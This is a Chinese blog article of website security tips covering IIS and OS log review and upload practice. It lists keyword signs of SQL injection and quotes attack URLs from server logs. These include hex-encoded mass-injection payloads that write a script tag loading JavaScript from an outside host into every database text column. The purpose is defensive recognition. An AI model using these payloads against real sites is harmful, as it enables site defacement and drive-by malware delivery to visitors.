网站安全管理/网站经营文档汇编

最新推荐文章于 2024-11-29 23:50:09 发布

原创最新推荐文章于 2024-11-29 23:50:09 发布 · 405 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#文档 #c #sqlserver #服务器 #sql server #数据库

本文提供了一系列网站安全管理措施，包括IIS日志分析、操作系统日志分析、图片与文件上传技巧及数据备份策略，帮助网站管理员有效监测和防御网络攻击。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

说明：本文档由山有网www.sxurl.com-专栏作者张谦龙创作，发表请注明：来源：山有网www.sxurl.com

网站安全管理需要持久的监控和防范，因为网站在公网上平均每天至少会遭到几十次攻击，及时的了解网站的运行情况、了解攻击来源将能更好的维护网站的安全。

1 IIS日志分析

网站管理员需要经常查看IIS日志，以判断网站是否遭到攻击，何时攻击、攻击来源等。在查看日志时，要检查访问URL中是否存在非法访问参数，一般来说，非法访问参数具有一下几个特点：

包含SQL关键字：如select，drop,exec，update等；

包含1=1 case（字符串）>0，<，>，and，or等字样；

包含大量被编码的字符，被编码的字符特征是其中存在很多%号；

包含进制描述符，如0x等。

包含数据库名称，如sqlserver，oracle等。

包含js脚本，如scirpt,.js等。

对于确定是具有攻击行为的IP地址，要对该IP地址进行记录，便于日后报案及重做系统后重新配置时使用。同时要禁止该IP访问服务器。禁止该IP访问服务器有2种方法，一种是在防火墙中配置，另一种是在IIS中配置，这2种方法种的任何一种都可以。

以下是几种攻击代码范例：

1	http://www.sxurl.com/video2.aspx?id=2755 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1
2	http://www.sxurl.com/video2.aspx?id=2818' and 1=1 and ''='
3	http://www.sxurl.com/viewf.aspx?id=21078;UPDATE www_infodata set infotitle='方便面国家标准将出台包装须明示添加剂2' where infoid=21078;--
4	/dn/view.asp infoid=24045;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- 80 - 123.140.74.29 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
5	filelst.asp parentid=1144;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--\|-\|ASP_0113\|脚本超时

2 操作系统日志分析

2.1 应用程序日志

在这里重点查看标志为警告和错误的日志，并且是关于ASP.net和SQL SERVER的。

2.2 安全性

在这里重点查看状态为“审核失败”的记录，如果有大量的连续的“审核失败”记录，可能表明操作系统遭到了攻击。防范这种攻击方式的最好方式是给操作系统用户设置复杂的密码和定期更换密码。

3 图片处理技巧

在上传图片时，建议将图片设置成网站规定的大小，分辨率设为72，同时，尽量采用.gif格式的图片。

4 文件上传技巧

在上传文件时，如软件、课件等，如果不是需要播放的文件（包括视频文件和音频文件），尽量将文件打包成.rar或者.zip格式上传。在压缩包内增加网站宣传和指向网站的链接。这有助于网站宣传。同时，因为迅雷，百度等搜索工具经常会搜索到网站的资源，这就导致了盗链情况，如果将网站宣传信息包含在文件中，将可以将盗链产生的负面影响（如服务器额外资源开销）变为正面推广。